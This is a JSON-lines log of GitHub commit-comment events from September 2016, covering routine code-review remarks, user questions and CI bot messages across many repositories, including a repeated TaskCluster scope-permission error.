{"id":"4583355640","type":"CommitCommentEvent","actor":{"login":"chrisknoll"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":19078701,"position":null,"line":null,"path":null,"commit_id":"8878600b17f0261be4d585d8a599864f2d987f41","created_at":"2016-09-19T13:41:49Z","updated_at":"2016-09-19T13:41:49Z","body":"Let me know what changes you are thinking about, and I will arrange the changes.  Do not make them yourself; I don't want to have another situation where code I put in there mysteriously vanished without notice."}},"created_at":"2016-09-19T13:41:49Z"}
{"id":"4583355708","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19078702,"position":null,"line":null,"path":null,"commit_id":"9494679db6bb4ec9dcbe74281cb12b7f76308f80","created_at":"2016-09-19T13:41:50Z","updated_at":"2016-09-19T13:41:50Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:secret-fix\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"aKCUCI2kSIGNMGyYWVrbKQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Example Add-on Unit Tests\\\",\\n    \\\"description\\\": \\\"Example Add-on Unit Tests\\\",\\n    \\\"owner\\\": \\\"Standard8@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\"\\n  },\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"env\\\": {\\n      \\\"NEED_WINDOW_MANAGER\\\": true,\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"secret-fix\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"0000000000000000000000000000000000000000\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"secret-fix\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"Standard8\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"9494679db6bb4ec9dcbe74281cb12b7f76308f80\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"secret-fix\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"Standard8@noreply.github.com\\\"\\n    },\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"standard8/example-addon-repo-functional:2016082501.01748a2b1a46\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"./bin/setup.sh && curl -O https://ftp.mozilla.org/pub/firefox/releases/48.0.2/linux-x86_64/en-US/firefox-48.0.2.tar.bz2 && tar xfj *.bz2 && git clone https://github.com/mozilla/example-addon-repo.git repo && cd repo && git checkout secret-fix && npm install && COVERALLS_REPO_TOKEN=`python scripts/get_secret.py` FIREFOX_BIN=~/firefox/firefox npm run test:karma\\\"\\n    ]\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"jobKind\\\": \\\"test\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"lint\\\"\\n      },\\n      \\\"symbol\\\": \\\"ES\\\"\\n    }\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:41:47.720Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:41:47.720Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PIil7ByATx6CNOIXODPbew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:41:47.720Z\\\"\\n}\\n  time:     2016-09-19T13:41:47.867Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:secret-fix\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:secret-fix\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"aKCUCI2kSIGNMGyYWVrbKQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Example Add-on Unit Tests\\\",\\n    \\\"description\\\": \\\"Example Add-on Unit Tests\\\",\\n    \\\"owner\\\": \\\"Standard8@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\"\\n  },\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"env\\\": {\\n      \\\"NEED_WINDOW_MANAGER\\\": true,\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"secret-fix\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"0000000000000000000000000000000000000000\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"secret-fix\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"Standard8\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"9494679db6bb4ec9dcbe74281cb12b7f76308f80\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"secret-fix\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"Standard8@noreply.github.com\\\"\\n    },\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"standard8/example-addon-repo-functional:2016082501.01748a2b1a46\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-lc\\\",\\n      \\\"./bin/setup.sh && curl -O https://ftp.mozilla.org/pub/firefox/releases/48.0.2/linux-x86_64/en-US/firefox-48.0.2.tar.bz2 && tar xfj *.bz2 && git clone https://github.com/mozilla/example-addon-repo.git repo && cd repo && git checkout secret-fix && npm install && COVERALLS_REPO_TOKEN=`python scripts/get_secret.py` FIREFOX_BIN=~/firefox/firefox npm run test:karma\\\"\\n    ]\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"jobKind\\\": \\\"test\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"lint\\\"\\n      },\\n      \\\"symbol\\\": \\\"ES\\\"\\n    }\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:41:47.720Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:41:47.720Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"PIil7ByATx6CNOIXODPbew\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:41:47.720Z\\\"\\n}\\n  time:     2016-09-19T13:41:47.867Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:secret-fix\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"aKCUCI2kSIGNMGyYWVrbKQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"metadata\": {\n                        \"name\": \"Example Add-on Unit Tests\",\n                        \"description\": \"Example Add-on Unit Tests\",\n                        \"owner\": \"Standard8@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/example-addon-repo.git\"\n                    },\n                    \"workerType\": \"github-worker\",\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\"\n                    ],\n                    \"payload\": {\n                        \"env\": {\n                            \"NEED_WINDOW_MANAGER\": true,\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"secret-fix\",\n                            \"GITHUB_BASE_SHA\": \"0000000000000000000000000000000000000000\",\n                            \"GITHUB_BASE_BRANCH\": \"secret-fix\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/example-addon-repo.git\",\n                            \"GITHUB_HEAD_USER\": \"Standard8\",\n                            \"GITHUB_HEAD_SHA\": \"9494679db6bb4ec9dcbe74281cb12b7f76308f80\",\n                            \"GITHUB_HEAD_BRANCH\": \"secret-fix\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"Standard8@noreply.github.com\"\n                        },\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"maxRunTime\": 1200,\n                        \"image\": \"standard8/example-addon-repo-functional:2016082501.01748a2b1a46\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-lc\",\n                            \"./bin/setup.sh && curl -O https://ftp.mozilla.org/pub/firefox/releases/48.0.2/linux-x86_64/en-US/firefox-48.0.2.tar.bz2 && tar xfj *.bz2 && git clone https://github.com/mozilla/example-addon-repo.git repo && cd repo && git checkout secret-fix && npm install && COVERALLS_REPO_TOKEN=`python scripts/get_secret.py` FIREFOX_BIN=~/firefox/firefox npm run test:karma\"\n                        ]\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"jobKind\": \"test\",\n                            \"machine\": {\n                                \"platform\": \"lint\"\n                            },\n                            \"symbol\": \"ES\"\n                        }\n                    },\n                    \"created\": \"2016-09-19T13:41:47.720Z\",\n                    \"deadline\": \"2016-09-20T13:41:47.720Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"PIil7ByATx6CNOIXODPbew\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-20T13:41:47.720Z\"\n                },\n                \"time\": \"2016-09-19T13:41:47.867Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla/example-addon-repo:pull-request\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/example-addon-repo:branch:secret-fix\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-19T13:41:50Z"}
{"id":"4583357258","type":"CommitCommentEvent","actor":{"login":"saxiro"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19078707,"position":67,"line":70,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T13:42:09Z","updated_at":"2016-09-19T13:42:09Z","body":"Esse eu percebi depois, mas evitei um terceiro commit... hehehe"}},"created_at":"2016-09-19T13:42:09Z"}
{"id":"4583359852","type":"CommitCommentEvent","actor":{"login":"nudles"},"repo":{"name":"gokulr914/new"},"payload":{"comment":{"id":19078711,"position":299,"line":299,"path":"b/MainActivity.java","commit_id":"915451aac7c66e46001ded79b2c7a587c240884f","created_at":"2016-09-19T13:42:38Z","updated_at":"2016-09-19T13:42:38Z","body":"why do you launch a new thread to run compHandler_1?\r\nhow do you synchronize this thread with the main thread?"}},"created_at":"2016-09-19T13:42:38Z"}
{"id":"4583360575","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19078715,"position":null,"line":null,"path":null,"commit_id":"997a3cd9cacad255a5e68e3e6b77ded26f65998d","created_at":"2016-09-19T13:42:45Z","updated_at":"2016-09-19T13:42:45Z","body":"I reverted this"}},"created_at":"2016-09-19T13:42:45Z"}
{"id":"4583363046","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19078720,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T13:43:14Z","updated_at":"2016-09-19T13:43:14Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-19T13:43:14Z"}
{"id":"4583363079","type":"CommitCommentEvent","actor":{"login":"laanwj"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":19078721,"position":null,"line":null,"path":null,"commit_id":"9f5c641a4006bd71bf4c2d76c7446cb6e6bfce49","created_at":"2016-09-19T13:43:14Z","updated_at":"2016-09-19T13:43:14Z","body":"Please don't spam questions on random commits. Can you please ask this on the [bitcoin stack exchange](https://bitcoin.stackexchange.com/) and send me a link and I'd be happy to help you."}},"created_at":"2016-09-19T13:43:14Z"}
{"id":"4583363673","type":"CommitCommentEvent","actor":{"login":"techra"},"repo":{"name":"KunaiFire/rechat-dl"},"payload":{"comment":{"id":19078722,"position":null,"line":null,"path":null,"commit_id":"2b4f25637ecfa17d51a174841b23e39299477af2","created_at":"2016-09-19T13:43:21Z","updated_at":"2016-09-19T13:43:21Z","body":"@KunaiFire ping Can you help an end-user, please? I have no module named requests. Trying to install requests, it says I have no module named setuptools. Trying to install setuptools, it says I have no module named ConfigParser. I'm going deeper into a nested dolls rabbit hole. My windows 7 command line doesn't recognise pip install requests anywhere. I think I have Python 2.7 installed. Help!"}},"created_at":"2016-09-19T13:43:21Z"}
{"id":"4583365767","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":19078726,"position":null,"line":null,"path":null,"commit_id":"695393890061ba73337d2d39bd1ec6b69991b2fc","created_at":"2016-09-19T13:43:43Z","updated_at":"2016-09-19T13:43:43Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SO9dkGNARMePZAgRjnnBdA"}},"created_at":"2016-09-19T13:43:43Z"}
{"id":"4583368185","type":"CommitCommentEvent","actor":{"login":"bcb"},"repo":{"name":"bcb/jsonrpcclient"},"payload":{"comment":{"id":19078735,"position":null,"line":null,"path":null,"commit_id":"6196d5fa5f10cfbfcf093021e74742c80d9d171e","created_at":"2016-09-19T13:44:08Z","updated_at":"2016-09-19T13:44:08Z","body":"Created #30 for moving the deprecation warnings to init rather than import time.\r\n\r\nThe warnings are silenced by default with good reason - deprecation shouldn't affect users. Forcing deprecation warning to be displayed is overriding this design decision. Developers should enable warnings while developing/testing."}},"created_at":"2016-09-19T13:44:08Z"}
{"id":"4583368788","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078738,"position":41,"line":119,"path":"addons/mrp/models/mrp_workcenter.py","commit_id":"4387049a09fadbc9c6fe6aeda0991678e5759a00","created_at":"2016-09-19T13:44:15Z","updated_at":"2016-09-19T13:44:15Z","body":"useless diff here"}},"created_at":"2016-09-19T13:44:15Z"}
{"id":"4583372171","type":"CommitCommentEvent","actor":{"login":"saxiro"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19078749,"position":29,"line":20,"path":"php/freelancer/trabalho-disponivel.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T13:44:52Z","updated_at":"2016-09-19T13:44:52Z","body":"Se não me engano não há a necessidade de utilizar o AS... ele funciona sem ele mesmo... de qualquer forma é de livre escolha!!!"}},"created_at":"2016-09-19T13:44:52Z"}
{"id":"4583373077","type":"CommitCommentEvent","actor":{"login":"voidtek"},"repo":{"name":"ec-europa/platform-dev"},"payload":{"comment":{"id":19078752,"position":74,"line":162,"path":"profiles/common/modules/custom/tmgmt_poetry/src/tmgmt_poetry.behat.inc","commit_id":"1b6ba49b9bfeeb8401f34a8c929de5605a301cb6","created_at":"2016-09-19T13:45:02Z","updated_at":"2016-09-19T13:45:02Z","body":"Done.\r\nthe function is _tmgmt_poetry_get_active_translation_jobs_by_entity_id()"}},"created_at":"2016-09-19T13:45:02Z"}
{"id":"4583373439","type":"CommitCommentEvent","actor":{"login":"gawel"},"repo":{"name":"tonioo/modoboa"},"payload":{"comment":{"id":19078754,"position":12,"line":30,"path":"modoboa/admin/templates/admin/domain_detail.html","commit_id":"e0f2f345232734c699cb19a9f86708e74b7ddafe","created_at":"2016-09-19T13:45:08Z","updated_at":"2016-09-19T13:45:08Z","body":"Well, that's the code you commited a few days ago. Ask yourself :p"}},"created_at":"2016-09-19T13:45:08Z"}
{"id":"4583375300","type":"CommitCommentEvent","actor":{"login":"carlson"},"repo":{"name":"mongodb/mongoid"},"payload":{"comment":{"id":19078757,"position":null,"line":null,"path":null,"commit_id":"3e87dab878847e0bdddcc3289d9de96cc04344e4","created_at":"2016-09-19T13:45:27Z","updated_at":"2016-09-19T13:45:27Z","body":"@estolfo: I can recreate the error with the following test:\r\n\r\n```ruby\r\n\r\nclass Project\r\n  include Mongoid::Document\r\n\r\n  field :name\r\n  belongs_to :person, optional: true\r\n  has_many :tasks\r\nend\r\n\r\nclass Task\r\n  include Mongoid::Document\r\n\r\n  field :completed, type: Boolean\r\n  belongs_to :project\r\n  belongs_to :person, optional: true\r\nend\r\n\r\ncontext \"when relation is nested with nil value\" do\r\n\r\n  let(:person) do\r\n    Person.create!\r\n  end\r\n\r\n  let(:project) do\r\n    Project.create!(name: \"Train for Marathon\", person: person)\r\n  end\r\n\r\n  before do\r\n    Task.create!(project: project, person: nil)\r\n  end\r\n\r\n  it \"should not raise an error\" do\r\n    expect {\r\n      Task.includes(:person, project: [:person]).first\r\n    }.to_not raise_error\r\n  end\r\nend\r\n\r\n```\r\n\r\nThe error occurs in the relations/eager/base.rb set_relation method when the doc passed is nil. A similar issue exists in the set_relation methods in has_and_belongs_to_many and has_many set_relation methods."}},"created_at":"2016-09-19T13:45:27Z"}
{"id":"4583377542","type":"CommitCommentEvent","actor":{"login":"nudles"},"repo":{"name":"gokulr914/new"},"payload":{"comment":{"id":19078764,"position":334,"line":334,"path":"b/MainActivity.java","commit_id":"915451aac7c66e46001ded79b2c7a587c240884f","created_at":"2016-09-19T13:45:49Z","updated_at":"2016-09-19T13:45:49Z","body":"feature extraction should not be related to GUI...\r\nfeature extraction is just a pure mathematical calculation process: raw input data --- > a vector of extracted features.\r\nyou can do feature extraction on any platforms, linux, windows, macos and andrioid os. It is independent to the devices."}},"created_at":"2016-09-19T13:45:49Z"}
{"id":"4583378008","type":"CommitCommentEvent","actor":{"login":"culurciello"},"repo":{"name":"e-lab/torch7-demos"},"payload":{"comment":{"id":19078766,"position":19,"line":30,"path":"RNN-train-sample/train.lua","commit_id":"98bebf55cf4f04e4231577f037c7769b6231f647","created_at":"2016-09-19T13:45:53Z","updated_at":"2016-09-19T13:45:53Z","body":"Thanks you are right, my bad!"}},"created_at":"2016-09-19T13:45:53Z"}
{"id":"4583379430","type":"CommitCommentEvent","actor":{"login":"gawel"},"repo":{"name":"tonioo/modoboa"},"payload":{"comment":{"id":19078770,"position":21,"line":113,"path":"modoboa/admin/models/domain.py","commit_id":"e0f2f345232734c699cb19a9f86708e74b7ddafe","created_at":"2016-09-19T13:46:10Z","updated_at":"2016-09-19T13:46:10Z","body":"Just because I like bool. Don't see the problem. (and make it clear that it return a bool)"}},"created_at":"2016-09-19T13:46:10Z"}
{"id":"4583380260","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"cc02030/com"},"payload":{"comment":{"id":19078771,"position":null,"line":null,"path":null,"commit_id":"6c4315d78432fa3568a617f9e5d046fc0b12e9d5","created_at":"2016-09-19T13:46:19Z","updated_at":"2016-09-19T13:46:19Z","body":"cc02030 doesn’t have any public repositories yet."}},"created_at":"2016-09-19T13:46:19Z"}
{"id":"4583380839","type":"CommitCommentEvent","actor":{"login":"caiqinghua"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":19078774,"position":null,"line":null,"path":null,"commit_id":"9f5c641a4006bd71bf4c2d76c7446cb6e6bfce49","created_at":"2016-09-19T13:46:24Z","updated_at":"2016-09-19T13:46:24Z","body":"Thank you.\n\n> 在 2016年9月19日，下午9:43，Wladimir J. van der Laan <notifications@github.com> 写道：\n> \n> Please don't spam questions on random commits. Can you please ask this on the bitcoin stack exchange and send me a link and I'd be happy to help you.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-19T13:46:24Z"}
{"id":"4583381174","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19078779,"position":null,"line":null,"path":null,"commit_id":"4387049a09fadbc9c6fe6aeda0991678e5759a00","created_at":"2016-09-19T13:46:29Z","updated_at":"2016-09-19T13:46:29Z","body":"[REF] mrp: workcenter: blocked and productive time\r\n\r\n* The labels of the fields say that they store hours, but actually they store minutes. Correct the code to store hours.\r\n* Add digits to fload field for a better display in the webclient"}},"created_at":"2016-09-19T13:46:29Z"}
{"id":"4583381370","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"cc02030/com"},"payload":{"comment":{"id":19078780,"position":null,"line":null,"path":null,"commit_id":"6c4315d78432fa3568a617f9e5d046fc0b12e9d5","created_at":"2016-09-19T13:46:31Z","updated_at":"2016-09-19T13:46:31Z","body":"God"}},"created_at":"2016-09-19T13:46:31Z"}
{"id":"4583382374","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"cc02030/com"},"payload":{"comment":{"id":19078781,"position":null,"line":null,"path":null,"commit_id":"6c4315d78432fa3568a617f9e5d046fc0b12e9d5","created_at":"2016-09-19T13:46:41Z","updated_at":"2016-09-19T13:46:41Z","body":"https://github.com/cc02030/com/commit/6c4315d78432fa3568a617f9e5d046fc0b12e9d5"}},"created_at":"2016-09-19T13:46:41Z"}
{"id":"4583387935","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19078796,"position":null,"line":null,"path":null,"commit_id":"f7e44066e4cbe3420314c652dabbc1b00d238331","created_at":"2016-09-19T13:47:41Z","updated_at":"2016-09-19T13:47:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MJqQTfm4&#x2F;42-unable-to-set-media-gallery-album-group-ownership-no-group-dropdown-shown\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Unable to set Media Gallery album group ownership - no group dropdown shown</a>"}},"created_at":"2016-09-19T13:47:41Z"}
{"id":"4583388286","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"cc02030/com"},"payload":{"comment":{"id":19078797,"position":1,"line":1,"path":"README.md","commit_id":"6c4315d78432fa3568a617f9e5d046fc0b12e9d5","created_at":"2016-09-19T13:47:44Z","updated_at":"2016-09-19T13:47:44Z","body":"cc02030 doesn’t have any public repositories yet."}},"created_at":"2016-09-19T13:47:44Z"}
{"id":"4583389235","type":"CommitCommentEvent","actor":{"login":"bcamper"},"repo":{"name":"tangrams/bubble-wrap"},"payload":{"comment":{"id":19078799,"position":null,"line":null,"path":null,"commit_id":"b41de7a6e9146fff761c5fe8baa3d8c95ab11be2","created_at":"2016-09-19T13:47:55Z","updated_at":"2016-09-19T13:47:55Z","body":"it's not working because of a tangram issue updating globals at run-time, but I'm releasing a fix for that today, will update this too then"}},"created_at":"2016-09-19T13:47:55Z"}
{"id":"4583390129","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"cc02030/com"},"payload":{"comment":{"id":19078800,"position":null,"line":null,"path":null,"commit_id":"6c4315d78432fa3568a617f9e5d046fc0b12e9d5","created_at":"2016-09-19T13:48:05Z","updated_at":"2016-09-19T13:48:05Z","body":"6c4315d"}},"created_at":"2016-09-19T13:48:05Z"}
{"id":"4583390170","type":"CommitCommentEvent","actor":{"login":"francescoagati"},"repo":{"name":"bertfreudenberg/SqueakJS"},"payload":{"comment":{"id":19078801,"position":null,"line":null,"path":null,"commit_id":"a5eb3a716232f4a8da3aa4888803d9c5211533af","created_at":"2016-09-19T13:48:06Z","updated_at":"2016-09-19T13:48:06Z","body":"Cuis can run on squeakjs?"}},"created_at":"2016-09-19T13:48:06Z"}
